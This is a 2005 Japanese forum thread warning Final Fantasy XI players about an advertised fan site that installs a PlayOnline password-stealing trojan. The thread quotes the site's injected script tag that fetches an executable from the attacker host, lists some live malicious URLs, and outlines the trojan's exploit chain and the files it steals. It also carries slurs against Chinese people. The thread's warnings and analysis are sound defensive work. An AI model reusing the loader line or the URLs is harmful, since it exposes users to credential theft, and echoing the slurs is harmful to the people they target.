罠サイトヤバス

このエントリーをはてなブックマークに追加
1既にその名前は使われています
MSN、Yahooなんかに広告出してる「花の雫FF11情報局」ヤバス。
ページ開くとウィルス。IPアドレスの所属は中華。
テラヤバス。
2ワルキューレ ◆mci....ll. :2005/10/21(金) 20:56:51 ID:3AaQCxGD BE:76089683-##
2
3既にその名前は使われています:2005/10/21(金) 21:02:04 ID:UL1LL9IL
3
4既にその名前は使われています:2005/10/21(金) 21:02:48 ID:5UA9rBJw
4
51:2005/10/21(金) 21:02:52 ID:tUJ4NgNG
出し方:

http://www.yahoo.co.jp
http://www.msn.co.jp

で、検索欄に FF11 として検索するだけ。

でも、ウィルスソフト入ってない香具師にはオススメしない。
6既にその名前は使われています:2005/10/21(金) 21:02:59 ID:CIiLgkRV
え?
これマジ?
ネタ…だよね?

怖くて調べられないよぅ!
7既にその名前は使われています:2005/10/21(金) 21:05:12 ID:C2qKt6Ga
>>1
サイト管理者乙
8既にその名前は使われています:2005/10/21(金) 21:05:38 ID:TC9k4321
宣伝乙
91:2005/10/21(金) 21:06:11 ID:tUJ4NgNG
AntiVirは、

C:\DOCUMENTS AND SETTINGS\***\LOCAL SETTINGS\TEMPORARY INTERNET FILES\CONTENT.IE5\S9MVCTIJ\SVCHOST[1].EXE

Is the Trojan horse TR/Copiet.B.1

として反応。
10既にその名前は使われています:2005/10/21(金) 21:07:44 ID:tQ8wRg1h
なぁ、電話番号載ってるんだけど…。
だいたいYahoo検索でスポンサーサイトに掲載されること自体ワケワカラン。
11既にその名前は使われています:2005/10/21(金) 21:08:09 ID:MsJegPZ1
12既にその名前は使われています:2005/10/21(金) 21:08:14 ID:6MwIQ4q1
開いてみたが、ノートン先生は反応なし
13既にその名前は使われています:2005/10/21(金) 21:08:46 ID:MsJegPZ1
開いたけどNAV反応なし
14既にその名前は使われています:2005/10/21(金) 21:09:06 ID:UL1LL9IL
ヤフーヲッチャーってもうゴースト化してんじゃね?
151:2005/10/21(金) 21:12:24 ID:tUJ4NgNG
http://www2.arearesearch.co.jp/ip-kensaku.html

ココで調べると、

検索結果
IPアドレス 211.100.26.182
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

161:2005/10/21(金) 21:19:24 ID:tUJ4NgNG
コンテンツは全てパクりと思われる。

例えば、小説。
ググるとパクり元がすぐみっかる。
17既にその名前は使われています:2005/10/21(金) 21:20:26 ID:TC9k4321
Avast!で発見。
Win32:Mhtplo-31
トロイらしい。
フレームとして使用している
http://www.1102213.com/ff11help/money.htm
にウィルスが仕込まれているようだ。
18既にその名前は使われています:2005/10/21(金) 21:21:33 ID:AyFkQMJE
なんでそんな必死なん?
19既にその名前は使われています:2005/10/21(金) 21:21:33 ID:QJx+V6yP
有益情報っぽのでアゲ
201:2005/10/21(金) 21:25:31 ID:tUJ4NgNG
このトロイが、FFの為に作られたモノで、POLパスワード抜かれたら...。

ある日突然キャラ消されてて、装備品とか全部RMTに回される、と。
21既にその名前は使われています:2005/10/21(金) 21:28:55 ID:eWRAFi8m
ここですか。●抜け
http://www.japan213.com●/
22既にその名前は使われています:2005/10/21(金) 21:29:42 ID:eWRAFi8m
うお、だめじゃんwwww
http://www.●japan213.com/
23既にその名前は使われています:2005/10/21(金) 21:30:12 ID:LqY+O1re
■<これがDDoSの元です!!!
  これですこれこれ!!!    多分。
241:2005/10/21(金) 21:30:42 ID:tUJ4NgNG
トロイ検知可能ソフト:

AntiVir http://ringonoki.net/tool/antiv/antivir.html
Avast! http://www.forest.impress.co.jp/lib/inet/security/antivirus/avast.html

踏んじゃった香具師はチェック汁。
251:2005/10/21(金) 22:27:57 ID:tUJ4NgNG
注意age
って危険だと思ってるの漏れだけ?
26既にその名前は使われています:2005/10/21(金) 22:33:36 ID:loTDGDLZ
何?
トロイ無いですよ?
27既にその名前は使われています:2005/10/21(金) 22:34:27 ID:4Hn9vc5I
いい宣伝になるもんな。









ふざけんな。
28既にその名前は使われています:2005/10/21(金) 22:35:36 ID:loTDGDLZ
宣伝て何の宣伝?
291:2005/10/21(金) 22:36:34 ID:tUJ4NgNG
今開いてみたけどやっぱりAntiVirが反応するyp。
トップページ開くまでに3回。
30既にその名前は使われています:2005/10/21(金) 22:37:30 ID:D53EZYQS
311:2005/10/21(金) 22:39:12 ID:tUJ4NgNG
罠サイトの創作小説

http://www.japan213.com/suo.htm
(ここはウィルス無いみたい。)


パクり元

http://ff11-free.sakura.ne.jp/i/nove/00-00.html


罠サイトの防具

http://www.japan213.com/fang.htm


パクり元

http://homepage3.nifty.com/~ffxi/Shield.html
321:2005/10/21(金) 22:41:38 ID:tUJ4NgNG
想定シナリオ


1. 中華 罠サイト作成 トロイ入りで踏むとPOLパスワードを抜く
2. 中華 罠サイトのURLをYahoo!とMSNに広告として出稿
3. FF11プレイヤー、Yahoo!とかMSNでFF11ワードで検索して罠サイト踏む
4. FF11プレイヤー、ある日ログインしたらキャラが消えてる。持ってた装備は中華によりRMTの餌食に。

こんな感じ。
どう?

トロイを検出しない香具師がいるのは、トロイができたてほやほやで
まだ国内ソフトでは対策出来てないからと桃割れ。
331:2005/10/21(金) 22:46:02 ID:tUJ4NgNG
想定シナリオ(漏れに関する)


1. キャラ削除事件が相次ぐ

→ だから言ったじゃないか!(得意げ)

2. ナニも起きない

→ 漏れの警告のおかげでナニも起きなかったな!(得意げ)


スレ立った時点で漏れ得意げ確定。
34既にその名前は使われています:2005/10/21(金) 22:49:41 ID:loTDGDLZ
見事につられたw


35既にその名前は使われています:2005/10/21(金) 22:50:30 ID:/3i+2ets
眠いから10文字いないでよろ
36既にその名前は使われています:2005/10/21(金) 22:52:48 ID:iXceEgxd
まだIEでの閲覧のみで感染するウィルスなんて存在するの?w
37既にその名前は使われています:2005/10/21(金) 22:55:25 ID:loTDGDLZ
あ、私IEじゃない
ていうかIE使ってる人ここにいるの?
38既にその名前は使われています:2005/10/21(金) 22:57:45 ID:9e4DGTKe
http://www.1102213.com/ff11help/money.htm
このソースに
<SCRIPT LANGUAGE="Script" src="http://www.1102213.com/ff11help/svchost.exe"></SCRIPT>
の記述あり
39既にその名前は使われています:2005/10/21(金) 22:59:58 ID:1g9Jt4Xh
PS2版ユーザーだが、気になったので調べてみた。
>>1 >>32のストーリーでほぼ大当たりだよ。
POLのパス抜きトロイの疑いが極めて高い。

www.japan213.com = www.1102213.com = 211.100.26.182(中国)

http://www●1102213●com/ff11help/money.htmにはWindowsのHTML HELPの
脆弱性(MS05-026あたりかな)を突くスクリプトが仕込まれている。これに
よってicyfox.chmという変造HTMLヘルプが実行されて、
http://www●1102213●com/ff11help/svchost.exeがダウンロード、実行さ
れる。これがパスワードを抜くトロイ本体。Norton AntiVirus 2005は無反
応だったけど、UPXによる圧縮を解いてバイナリファイルをのぞいたら怪し
げな文字列がたくさん見つかった。
40既にその名前は使われています:2005/10/21(金) 23:02:38 ID:+SmXEfEw
即座に通報汁!!
国内からじゃ不正アクセスなんて容易に捕まえられるだろうけど
糞中国からじゃー泣き寝入りで終わるぞ!!
41既にその名前は使われています:2005/10/21(金) 23:05:57 ID:RjUzom6B
罠サイト踏んだことあるが…w
当時は解約中だったけど…

なんかアダルトサイトの宣伝メールが来るようになったんだがそれは別件かn
42既にその名前は使われています:2005/10/21(金) 23:08:02 ID:iXceEgxd
>>37
IEコンポーネント使ってる奴がほとんじゃない?
431:2005/10/21(金) 23:36:22 ID:BR0RhEoA
帰宅したら解析が進んでて漏れの得意げ度がアップでつよ。

とか、アホなこと言ってないで早くY!なりMSNなりにタレコむべきなんだろうか。
でも、被害出てからじゃないと対応されないのかな。

カイシャはAntiVirだったけど自宅はVirusBusterなので怖くて踏めないyp
44既にその名前は使われています:2005/10/21(金) 23:37:19 ID:207dPxU4
会社から不用意にサイトを閲覧するな

いやこれはわりとマジで
451:2005/10/21(金) 23:40:24 ID:BR0RhEoA
>>44
まったくですな。

でも、Y!で検索して一見個人サイトっぽいのが広告出稿してたら
つい押したくナンネ?
46既にその名前は使われています:2005/10/21(金) 23:41:06 ID:McnMhjOk
FF トロイ と来たらDDoSでしょう
そのサイト覗いた奴がDDoSの踏み台に使われてるんじゃねーの?
47既にその名前は使われています:2005/10/21(金) 23:42:10 ID:207dPxU4
>45
第一に会社でポータルサイトを開かない。
48既にその名前は使われています:2005/10/21(金) 23:43:08 ID:qnCOamDq
「広告として上げられてるサイトを閲覧したら、ウィルス警告がでるんですが」
みたいな感じで警告画面のSS添付してメルっとけば、そのうち広告削除されると思うけど。
あえて泳がせて、被害者出てから官憲召喚でもそれはそれでいい祭りになるがなー
49既にその名前は使われています:2005/10/21(金) 23:46:45 ID:1Zba77Uy
ノートン先生が反応しないならちょっと踏めないなぁ
501:2005/10/21(金) 23:50:31 ID:BR0RhEoA
>>48

だよナ。
漏れも後者の方が面白そうだと思って放置してたのだけど、あまりに
FF界で話題になんないから出来心でスレ立てた。

今も後悔していない。
5139:2005/10/21(金) 23:53:10 ID:1g9Jt4Xh
Windowsのパッチをちゃんと適用していればページを開いても大丈夫そうだけど、
未知の脆弱性を突いてる可能性もあるから件のサイトは踏まないほうがよいかと。

・トロイと思われるsvchost.exeのUPX圧縮を解除
http://tune.ache-bang.com/~vg/outitem/up/img/6168.png

・圧縮を解いたsvchost.exeをバイナリエディタでのぞいた(見にくいかも)
http://tune.ache-bang.com/~vg/outitem/up/img/6169.png
http://tune.ache-bang.com/~vg/outitem/up/img/6171.png
http://tune.ache-bang.com/~vg/outitem/up/img/6172.png
http://tune.ache-bang.com/~vg/outitem/up/img/6173.png

svchost.exeはWindowsに含まれるネットワーク系のシステムプログラムで、通常は複数
起動されている。このトロイは偽装のために同じsvchost.exeという名前で常駐すると桃割れ。
リネージュかなんかのパス抜きトロイの亜種なんじゃないかな。で、一部のウイルス対策ソフトが検
出する。逆コンパイルはしてないけど、バイナリエディタでのぞいていると、スクリーンショットを撮って
www.japan213.comに送信するように見える。なんとなく。
それにしても、Nortonはこのテのトロイに弱すぎるにゃ orz~
52既にその名前は使われています:2005/10/21(金) 23:55:35 ID:xRRKbsOZ
漏れのもってるソフト反応しねーーーーww
53既にその名前は使われています:2005/10/21(金) 23:55:44 ID:xMLMQYqZ
age
5439:2005/10/21(金) 23:57:05 ID:1g9Jt4Xh
sageてしまった。バイナリエディタでのぞいただけだから、トロイかどうかの判断は
みんなに任せるよ。Win版のFF持ってないし。
551:2005/10/21(金) 23:59:42 ID:BR0RhEoA
>>51
神降臨

c:\gameff11.txtってのが出来てたらアウトなのかにゃー。

単にSS集めるトロイだといいのだが、中華がわざわざそんな愉快なモンに
カネ払ってY!なりMSNなりののせないだろうし、usr\all\login_w.binって
文字列がテラヤバスな感じだし。

品定め用にSS見て、めぼしいキャラを乗っ取り?
これならピンポイントで高額収入得られそうだし。
56既にその名前は使われています:2005/10/22(土) 00:01:29 ID:tCBBr/so
pol.exeというキーワードがある辺りがアレだな
571:2005/10/22(土) 00:02:27 ID:BR0RhEoA
続き。

漏れのマシンには、
C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
ってのがある。

開いてみると冒頭に
PlayOnline Login Setting File Ver 1.0
と書いてある。

ヤバス?
58既にその名前は使われています:2005/10/22(土) 00:03:46 ID:nbRhjbYI
ヤフーなぁ、
最近検索エンジンやスポンサー掲載とかなにかと移行作業中だから見落としもあるだろうな。

さて、土日はさむしどう出るヤホー。


あとどことは言わんが、同じくユーザー向けルール改変中の某大手サイトも手続き関係ゆるゆる。

59既にその名前は使われています:2005/10/22(土) 00:05:40 ID:rLuSMLAP
>>24
これいい、昨日医入れたノートン先生も見つけられなかったトロイだかウィルスだか発見
60既にその名前は使われています:2005/10/22(土) 00:12:17 ID:1iPUzzKy
いや、FF11やってる奴やばすぎ。(^.^)
61既にその名前は使われています:2005/10/22(土) 00:12:28 ID:dWYZU8mK
バスターで調べた人いる?
621:2005/10/22(土) 00:14:39 ID:JJGQG3Ek
よく見ると漏れヤバスヤバスしか言ってない。
6339:2005/10/22(土) 00:20:31 ID:lLeKpzkv
>>57
やっぱりそういうファイルがあるんだ。
そのファイルをhttp://www●japan213●com/ff11929/ff11.aspで
収集している希ガス。もしそうならきっとヤバス。
64既にその名前は使われています:2005/10/22(土) 00:20:36 ID:nBr0/ca2
頼むから□eはとっとと中華ban汁!

奴等がいるのはユーザーに取ってなんのメリットがあるんだ?

65既にその名前は使われています:2005/10/22(土) 00:24:39 ID:Wcsmhu9s
■<たくさん利益が出るのでユーザーによりよいゲーム環境として還元できます
66既にその名前は使われています:2005/10/22(土) 00:30:31 ID:dWYZU8mK
sageてた…
踏んでないからわからないけど、本当なら被害でるよね。
スクエニはちゃんと対応するのか、それともユーザーが泣き寝入りすることになるのか…
67既にその名前は使われています:2005/10/22(土) 00:32:30 ID:XvtMHVrb
マジヤバいなこれ・・・もう寝るけどageとくわ
68既にその名前は使われています:2005/10/22(土) 00:39:38 ID:JRJD3J9P
以前フィッシングサイトは問題になってたからなぁ。
ID抜きトロイサイトならそれ以上の問題だね。



そういやそのフィッシングサイトの措置ってどうなったんだっけ?
69既にその名前は使われています:2005/10/22(土) 00:43:03 ID:t/csvKhz
[+]<面倒なので被害が出た次の週あたりに対応します。
70既にその名前は使われています:2005/10/22(土) 00:44:20 ID:loujivx+
こいつは新聞載りそうだのう
71既にその名前は使われています:2005/10/22(土) 00:45:10 ID:seyryRLy
ソースの見方を教えれ
ググってもわからなかった
72既にその名前は使われています:2005/10/22(土) 00:52:15 ID:t/csvKhz
未知の脆弱性を突くタイプなら危険な気もするから、
踏んだ香具師はとりあえずPOLパスワード変更汁、とか言ってみるテスト
てか、駆除しないとどのみちまたパス抜かれるんだろうなw
73既にその名前は使われています:2005/10/22(土) 00:55:13 ID:tppUP8wp
アンチソフト入れて安心しきってる奴は注意しる
ノーd先生なんてウンコソフトはさっさとアンスコしる
74既にその名前は使われています:2005/10/22(土) 00:56:07 ID:lLeKpzkv
PlaoOnlineのメールフォームから■eには連絡をしておいた。
このスレッドも読んでくださいねとは書いたけど、2ちゃんを読みに来てくれるかなー。
Yahoo!とMSNには■eから連絡するでしょ。きっと。
75既にその名前は使われています:2005/10/22(土) 00:56:39 ID:YjhmtwdE
レジストリの〜currentversion\runにexplorff.exeを登録、Cのルートにgameff11.txtを生成てのが
特徴か?あとは毎度おなじみのsvchost.exeをユーザ名で起動?

>68
カード会社なりが警告文出して終わったはず。
実効被害が出ないかぎり、官憲は動けないし。
このサイト自体も、今の状態だけでは黒とは言えなさげ。
IDなりが抜かれて他人がログインすれば「不正アクセス禁止法」にかかるけど。
76既にその名前は使われています:2005/10/22(土) 00:57:11 ID:tppUP8wp
山田ウイルスもsvchost.exeだったよなぁ
77既にその名前は使われています:2005/10/22(土) 00:57:20 ID:EwuwcQ/n
ノートン先生の、罠コード見つけた瞬間ツール強制終了させるアレはもう無くなったの?
アレのせいでだいぶ前からノートン使ってないな
781:2005/10/22(土) 01:04:38 ID:JJGQG3Ek
■<大変話題になって嬉しい
79既にその名前は使われています:2005/10/22(土) 01:06:06 ID:tppUP8wp
>>1
スレタイをもっと人に見られるようなタイトルにすればよかったな。
801:2005/10/22(土) 01:06:35 ID:JJGQG3Ek
■<確かに。反省している。
81既にその名前は使われています:2005/10/22(土) 01:13:50 ID:3ar86hcx
もっと中華業者の罠っぷりを出したほうが目を引くな
82既にその名前は使われています:2005/10/22(土) 01:17:52 ID:hNdKKHUu
バスター搭載、IE開いて踏んでみた。直前に最新版にうpして反応なし
この前のWindowsのうpもやってあるが…ダメジャンヽ(;´д`)ノ

ちなみに思うんだが、トップページのSSの下の紹介文
個人サイトにしちゃ過剰に広告じみてないか?普通こんな書き方するだろうか?
83既にその名前は使われています:2005/10/22(土) 01:18:56 ID:duBla4iK
>>76
まだそんな子といってるのかw
84既にその名前は使われています:2005/10/22(土) 01:21:48 ID:+VgK/QIW
とりあえず
WINDOWSフォルダに
「gameff11.txt」
てのがあるとやばいんだよね??

どこかで踏んだかなと調べてみたけど
なかったので安心でおk?
851:2005/10/22(土) 01:23:13 ID:JJGQG3Ek
>>84
gameff11.txtは、c:\直下と桃割れ。

さて、寝るので、みんな、age続けてちょ。
86既にその名前は使われています:2005/10/22(土) 01:27:54 ID:+VgK/QIW
検索してもなさそうなので安心だぜー

FF11関連サイトでも既存のお気に入りサイトだけで
新しいサイトは安易に踏まないようにしなくちゃな。

でも早急に対応とか来るんでない?
■eもVerUPかなんかで外部に漏れないように対応汁!
87既にその名前は使われています:2005/10/22(土) 01:31:22 ID:ygDB5ua8
>>1がもうちょっとマシならなあ
【残念です。】
88既にその名前は使われています:2005/10/22(土) 01:36:15 ID:hNdKKHUu
スキャン結果出た。ちゃんとsvchost[1].exeありますた(;´д⊂)
バスターでも効果無なんで、興味半分で覗かないのが吉みたいだね
俺は全然この手の話は分からないんだが、TR/Copiet.B.1ってのはトロイのタイプのことなのかな
89既にその名前は使われています:2005/10/22(土) 01:38:37 ID:AEfXwNWq
90既にその名前は使われています:2005/10/22(土) 01:43:40 ID:dWYZU8mK
>>89が、その罠サイト?
91既にその名前は使われています:2005/10/22(土) 01:44:01 ID:dWYZU8mK
またさげちった・・
92既にその名前は使われています:2005/10/22(土) 01:46:42 ID:+VgK/QIW
>>89
シナチク乙^^;;;;;;;;;;
93既にその名前は使われています:2005/10/22(土) 01:48:40 ID:DtlAfETJ
にゃーん
 応援に来たにゃ
94既にその名前は使われています:2005/10/22(土) 01:50:37 ID:+VgK/QIW
シナチクが罠サイト>>89を張りやがったぞ!!
あろうことかネ実スレで!!

ひろゆきに報告だ!!
95既にその名前は使われています:2005/10/22(土) 01:54:22 ID:6Z6pbWo0
Avast!オススメ
やっぱり入れておいて良かった。
96既にその名前は使われています:2005/10/22(土) 01:56:49 ID:K4DSrXpI
これは常に上げねばなるまい
97既にその名前は使われています:2005/10/22(土) 02:01:11 ID:JS/ViqYu
収集されてるファイルって、POLのログイン名とパスワード保存している奴とかだったりしないか?
98既にその名前は使われています:2005/10/22(土) 02:01:35 ID:mxUVrTeN
なに?マジネタな訳?
99既にその名前は使われています:2005/10/22(土) 02:05:51 ID:6Z6pbWo0
パス抜きかどうかは判らんが
ウィルスはマジ
100既にその名前は使われています:2005/10/22(土) 02:06:24 ID:2iWO0IUg
よくわからんが、あげとくか
101既にその名前は使われています:2005/10/22(土) 02:06:25 ID:AtAZYMKz
avastはほんとフリーとは思えんな
102既にその名前は使われています:2005/10/22(土) 02:08:52 ID:sSxPIcDX
こういうの何でも踏む馬鹿は死んでも治らないからどうでもいいよ
103既にその名前は使われています:2005/10/22(土) 02:10:10 ID:8AlKzHir
>>1は社員でFA
ヘタレで対策できないから、ここで書いてんだろw
104既にその名前は使われています:2005/10/22(土) 02:19:16 ID:r//As7Z7
よくわからんが注意喚起のためage
105既にその名前は使われています:2005/10/22(土) 02:26:34 ID:lLeKpzkv
http://www●japan213●com/とhttp://www●1102213●com/が罠サイト。
今のところ、IPアドレスは211.100.26.182。これら2つのサイト内のペー
ジはいつ罠入りに差し替えられるか分からないので直リンはヤバス。

生意気にアクセス統計まで取ってやがる。簡体字中国語なんて全然読めな
いけど、使い捨て環境でこれを見たところ7月くらいから日本のFF関連掲示
板に誘導カキコをしていた。かなり悪質だな。
106既にその名前は使われています:2005/10/22(土) 02:35:03 ID:ka17dZ3X
age
107既にその名前は使われています:2005/10/22(土) 02:35:39 ID:K4DSrXpI
今北産業用にまとめてみるか

・MSNやYahooの検索サイトで広告を出している「花の雫FF11情報局」のページにトロイ発見
・ページを開くとウイルスに感染
・件のウイルスはAvast!で発見可能な様子
・もしかするとこんな展開?>>33
・ウイルスの中身?>>51
・その他>>55 >>57

適当にまとめてみたよ.訂正追加お願いします.

これが嘘だろうと真実だろうとFF関連のページには行きにくくなったなぁw
108既にその名前は使われています:2005/10/22(土) 02:40:10 ID:K4DSrXpI
>>107
訂正します・・・・orz
・もしかするとこんな展開?>>32
109既にその名前は使われています:2005/10/22(土) 02:41:53 ID:DF9/SXkR
これまじ?
検索したとき、たまに広告サイトとか踏むことあるんだけど。
110既にその名前は使われています:2005/10/22(土) 02:46:06 ID:lmMnnTjG
あぶない…自分で汚くまとめたレスを投下してしまうところだった…
>>107さんGJ
111既にその名前は使われています:2005/10/22(土) 02:53:10 ID:4Fpw9z5W
これ本当にPOLID抜いてアイテムとか盗まれたらRMTしっかり規制しない■が悪いんだよな
112既にその名前は使われています:2005/10/22(土) 02:54:11 ID:JS/ViqYu
>>111
いや、それはどうだろうw
113既にその名前は使われています:2005/10/22(土) 02:54:21 ID:r//As7Z7
これがDDoSの元のトロイだったりすることはないのかな?
俺すごく頭悪いこと言ってる?
114既にその名前は使われています:2005/10/22(土) 02:54:32 ID:lLeKpzkv
ありゃ。酒飲みながら書いてたらたらスッキリしたまとめが。もったいないから
書き込ませて(´・ω・`)ネ実にもいい人がガッツリといるんだね。ありがとう。

---
【POL垢盗む】絶対踏むな!【中華サイト】
---
PlayOnlineのアカウント情報を窃取するために作られたと思われるWebサイトが
見つかった。Yahoo! JAPANやMSNで"FF11"をキーワードに検索したときにスポン
サーサイトとして表示される「花の雫FF11情報局」がそれだ。このサイトは中国
に設置されており、アクセスするとWindowsのセキュリティホールを突いてPOLの
アカウント/パスワードを盗むトロイの木馬プログラムが実行される可能性がある。

罠を仕込んだ中華サイトのURLは、http://www●japan213●com/と
http://www●1102213●com/だ(事故アクセス防止のためドットをデカくしてある)。
いずれのサイトもIPアドレスは同じで211.100.26.182(割り当ては共産中国)。
これらのサイト内にあるページはいつ罠入りのものに差し替えられるか分からない
ので不用意にアクセスしないようにしてほしい。
115既にその名前は使われています:2005/10/22(土) 02:57:43 ID:uwUPTm2f
オラのマシンに、下のファイルあるよ。
C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
これは、元からあるファイルなんじゃないかと。

問題のページは、別(FFインスコしてない)マシンで踏んでみた。
なんか、"C:\gameff11.txt"がある人が、やべぇのかも。

でも、オレ(がトロイ作る)ならファイル送った後、消すだろうから、残ってねぇかもなぁ。
116既にその名前は使われています:2005/10/22(土) 02:59:37 ID:nfhOzZqw
あげとく
117既にその名前は使われています:2005/10/22(土) 03:01:01 ID:lLeKpzkv
>>114の続き

【スッキリシャッキリしたまとめ】>>107 >>108

【参考1】Norton AntiVirus 2005、Norton Internet Security 2005、ウイルスバス
ターでは防げない(>>12 >>13 >>39 >>82 >>88)。Avast!は「Win32:Mhtplo-31」と
して検出(>>17 >>24)。
【参考2】>>1 >>9 >>16 >>32 >>39 >>51 >>55 >>56 >>57 >>75
なお、スクウェアエニックスにはメールフォームから連絡済みです。 >>74

罠サイトにアクセスしてしまった人は、>>24 で紹介されているウイルス対策ソフト
でPCをチェックしておきましょう。

んでは、おやすみなさい。
118既にその名前は使われています:2005/10/22(土) 03:02:22 ID:rh2SEw2J
こわいからネットカフェからアクセスするか…
119既にその名前は使われています:2005/10/22(土) 03:02:58 ID:nDwk5uII
ネカフェからのほうが倍やばいんじゃねぇか。
既に色々入れられてたりするし。
120既にその名前は使われています:2005/10/22(土) 03:07:17 ID:r//As7Z7
とりあえずageて寝る
121既にその名前は使われています:2005/10/22(土) 03:08:35 ID:8AlKzHir
ウィルスバスタ2005での対策
1.メイン画面を起動し、左の縦に並んだメニューの「パーソナルファイアウォール」をクリック
2.右の「パーソナルファイアウォール設定」をクリック
3.「パーソナルファイアウォオールを有効にする」にチェックが入っている事を確認
4.「プロファイルの編集」枠のプロファイル名に丸印が付いている列をクリック
5.鉛筆マークの編集アイコンをクリック
6.「プロファイルの設定」画面が開くので、「除外リスト」タブのプラスマークの「追加」ボタンをクリック
7.「除外リストの追加/編集」画面が開くので以下を設定
 ・説明 「FF罠サイト」に変更
 ・対象 すべてのアプリケーション
 ・接続 受信
 ・アクセス処理 拒否
 ・プロトコル すべて
 ・ポート すべてのポート
 ・種類 IPアドレス
 ・ホスト名 空白
 ・IPアドレス 211  100  26  182
9.OKをクリック。同様に送信も拒否(7の設定内容で「接続」を「送信」で)
122既にその名前は使われています:2005/10/22(土) 03:10:23 ID:lLeKpzkv
>>115
うん、それが正常みたい。そのファイルにPOLのアカウント情報が記録されているらしい。
トロイがそのファイルを罠サイトに送信するかもしれないってのが今回のヤバスなとこのひとつ。
漏れWindows版のFF持ってないからこれ以上は役に立てないのよ。スマソ。
123既にその名前は使われています:2005/10/22(土) 03:13:23 ID:ctUK1xFZ
キンタマもこんな調子で感染が広まったんだろうな
こわいにゃん
124既にその名前は使われています:2005/10/22(土) 03:15:18 ID:lLeKpzkv
>>121 いい人だ〜〜。ありがとう〜。
>>103ではあんなに冷たかったのに(´・ω・`)
もしかして、これが今はやりのツンデレ? (´д`*)
125既にその名前は使われています:2005/10/22(土) 03:18:04 ID:ro7UP352
リアルヴァナディールで踏んできたら対応早いんじゃね?W
126既にその名前は使われています:2005/10/22(土) 03:18:05 ID:8AlKzHir
7月から罠サイトがあったらしいけど
国民生活センターのこれってもしかして

ttp://www.kokusen.go.jp/t_box/data/t_result0510.html
4)オンラインゲームの突然の利用停止
 「オンラインゲームを利用していたところ、身に覚えのない理由で突然アカウントを停止された。
運営業者に問い合わせても詳しい説明がされない」という情報が以前から寄せられています。

 情報が多く寄せられた運営業者に確認したところ、「アカウント停止された理由に覚えがないと
申し出があった場合再調査することもあるが、処分を覆すことはあまりない。
利用規約に『一切返金しない』と定めているため、返金等の対応はしていない」とのことでした。
今後、利用者に十分説明することや苦情処理体制を改善することを申し入れました。
127既にその名前は使われています:2005/10/22(土) 03:18:31 ID:ctUK1xFZ
ちょ・・・お前Int500くらいあるじゃにゃい?wwwww
128既にその名前は使われています:2005/10/22(土) 03:21:03 ID:8AlKzHir
>>124
うるせえな!黙ってろ!



設定・・・してから寝ろよ
129既にその名前は使われています:2005/10/22(土) 03:21:08 ID:DF9/SXkR
マジでニュースになりそうなネタだな。
それにしても、やっぱり中華は糞だなage
130既にその名前は使われています:2005/10/22(土) 03:24:43 ID:uwUPTm2f
これがニュースになって、■eが中華が糞って解ればいいのにな。。。




むりかなぁ、、、■だし。
131既にその名前は使われています:2005/10/22(土) 03:26:28 ID:fKZasi6D
遊んでる俺たち程には世間は何の関心もないし
■もサービス終了するまで臭い物には蓋精神で行くと思うよ
132既にその名前は使われています:2005/10/22(土) 03:27:48 ID:lLeKpzkv
>>128
きゃーー(/ω\)ツンデレの王子さまキターーーー!モジモジ。
設定して、ヒゲとスネ毛剃ったら寝るわね。モジョモジョ。
133既にその名前は使われています:2005/10/22(土) 03:31:46 ID://U5fwnz
不覚にもわらた。

これってPCでFF11やってなかったら無害?
134既にその名前は使われています:2005/10/22(土) 03:37:15 ID:K4DSrXpI
>>128
(*’-’)σ)´д`)

>>133
Win版狙いだろうね〜
135既にその名前は使われています:2005/10/22(土) 03:43:26 ID:lLeKpzkv
>>133
王子様にハタかれる前にマジレス。垢盗まれないけど変なプログラムが
仕込まれる(いわゆる感染)可能性があるので無害とはいえない。トロイの
挙動をキチンと検証するのはウイルス対策ソフトベンダーくらいしかないか
ら、ある程度信頼できる情報を得るには各社の情報ページをこまめに見る
しかない鴨。
でも、オンラインゲームのアカウント窃取を目的とするトロイは軽視されがち
で、あまりマトモに対応されてないみたい。ググった感じでは大手ではマカ
フィーが頑張ってる希ガスあるごんらどんくりぷとん。
136既にその名前は使われています:2005/10/22(土) 04:11:08 ID:K4DSrXpI
寝る前にあげ
興味を持った人は>>114>>117をチェック
137既にその名前は使われています:2005/10/22(土) 04:32:49 ID://U5fwnz
なるほど、とりあえず>>24のサイトからDLして
検索してもる
138既にその名前は使われています:2005/10/22(土) 04:33:29 ID:gCfrBtIl
age
139既にその名前は使われています:2005/10/22(土) 04:39:38 ID:lLeKpzkv
>>74の続報。中身はないけど。プレステでログインしたら定型文の
返信メールが来ていました。報告はしたからよろしくねってな内容で
返事をして終了。適切な措置を執ってくれるものと期待しています。
シェービングタイムも終わったので寝ます。

このスレに興味を持った人は>>114>>117をチェック! GNあげ。
140既にその名前は使われています:2005/10/22(土) 04:45:50 ID:sjjOUX68
AVGは駄目なのかな
ttp://www.grisoft.com/
141既にその名前は使われています:2005/10/22(土) 05:05:31 ID:/DjhjDK9
あげ
142既にその名前は使われています:2005/10/22(土) 05:14:49 ID:tGxW3Z8+
中華糞あげ
143既にその名前は使われています:2005/10/22(土) 05:18:02 ID:qa+5oju+
中華ってツール使ってんの?
挑発すげー遅いんだけど
144既にその名前は使われています:2005/10/22(土) 05:41:04 ID:uXy8jNdr
age
145既にその名前は使われています:2005/10/22(土) 07:45:46 ID:XvtMHVrb
出勤前にage
146既にその名前は使われています:2005/10/22(土) 07:47:36 ID:hblLlDVl
http://www●japan213●com
このサイト7月の上旬にはもうあった悪寒
そのころから罠が仕込んであったかどうかは不明
147既にその名前は使われています:2005/10/22(土) 07:58:09 ID:dRXW8Wsc
こうゆうのって実際、被害が出た場合ヤフーに請求すりゃいいのかね?
以前似たような事例で賠償金貰ってた例を見たことがあるけど。
148既にその名前は使われています:2005/10/22(土) 07:59:33 ID:dRXW8Wsc
ああ、このサイトでID抜かれたって証拠がないと無理かよく考えたら。
149既にその名前は使われています:2005/10/22(土) 08:14:27 ID:r//As7Z7
出勤前age
150既にその名前は使われています:2005/10/22(土) 08:26:08 ID:kC9eR/YX
これは大きな祭りにせんといかんでしょう。

今まで、多種ゲームのパスワード抜くウイルスがあったけど
国内ゲーム(特にFF11)は標的にされなかった。
今後、亜種含めてたくさん出回る可能性大。

しかし、この手のウィルスは韓国産だと決まってたけど、中国産も
出たのか。さすがに犯罪国家はロクなことせんな。(´・ω・`)
151既にその名前は使われています:2005/10/22(土) 08:41:01 ID:nfhOzZqw
